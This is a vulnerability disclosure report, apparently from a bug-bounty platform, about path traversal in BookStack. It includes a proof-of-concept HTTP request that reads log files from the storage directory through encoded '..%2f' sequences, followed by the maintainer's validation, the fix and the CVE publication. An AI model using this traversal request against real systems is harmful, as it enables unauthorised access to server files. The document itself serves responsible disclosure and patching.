Path Traversal in bookstackapp/bookstack

Valid

Reported on

Oct 30th 2021


Description

During reading recent BookStack source code (85dc8d) I discovered path traversal vulnerability. Authenticated user can have access to all files stored in storage directory.

Proof of Concept

GET /uploads/images/..%2f/..%2f/logs/laravel.log HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: XSRF-TOKEN=eyJpdiI6IkY0TGptRjlIa29xXC9iSFZqaE91bzVnPT0iLCJ2YWx1ZSI6Im9nZVZSblYxQmt1QXE5Tk9wS0NHVnhraGUySWlrNjhEZGVyeWhoN0ZOdjcxc2ZzTUFIYlozTHVJVzFMZ3VMMjdROUhCUTFjY2s4MVl0MUIxNGU0eWlnT1ErQlpUNHBGQTBJOHErcjR3MW1USVlkbGxCN21INm5pSDZVbk1pQkVBIiwibWFjIjoiNjZkNTUzM2YzMDE2ZjQwZTBiZTM5MTQ5NDY4NjQ4NmE1YzlkOTBhMDIyZjIyNTI2YjYxNjdiMWVhY2ZiMThiZCJ9; bookstack_session=eyJpdiI6Ik1iSDluUVVNU2JMblh0YmJmSjhNSEE9PSIsInZhbHVlIjoiS04wWk5DaEthMVVxUVFuMlwvNGdqVHpHRE95bFk1VjNJTzRvZTZQeVV1blZ3SUhFQ21ySTF1eFRWUWFtZlBiTEdTVzlCWlFxOGdUVEl4RmN1aDhIcUNzXC9tamFKQk1hVStuS2o3RUlUczJQRlo2OGp6NGs2OHU3Q1FGMjZJVlpLUSIsIm1hYyI6ImM3NmY2YWQ0MjdlYTU5OGEyMmQxNWI1NDMyMTQwMzE3NWMzODhiNmFiZDJhN2VmODA1YzExOTVjMWY1MTZmNTIifQ%3D%3D
Upgrade-Insecure-Requests: 1


Impact

Read log files which paths are predictable.

We have contacted a member of the bookstackapp/bookstack team and are waiting to hear back a month ago
We have contacted a member of the bookstackapp/bookstack team and are waiting to hear back a month ago
Dan Brown
a month ago

Maintainer


Thanks you so much again @theworstcomrade. Have verified on my own instance. Looks like there are some level of webserver protections that prevent this going too far up which is something but still far from ideal.

I'm especially annoyed at myself for having this vulnerability. Think I need to do a review through all image and attachment systems as many of these were written before I've been exposed to, and learnt from, a wide range of attack vectors.

Will mark this as valid and work into a patch to be deployed with the other fix.

Since you won't be paid due to the depleted bucket, is there a way I can send you £40 myself? I really appreciate your efforts of discovering and reporting this.

Dan Brown validated this vulnerability a month ago
theworstcomrade has been awarded the disclosure bounty
The fix bounty is now up for grabs
Dan Brown confirmed that a fix has been merged on 43830a a month ago
Dan Brown has been awarded the fix bounty
ImageController.php#L38 has been validated
theworstcomrade
a month ago

Researcher


@ssdmanbrown This patch looks good, I am no longer able to repeat the vulnerability. Thank You also for the bounty.

Jamie Slome
a month ago

Admin


CVE published! 🎊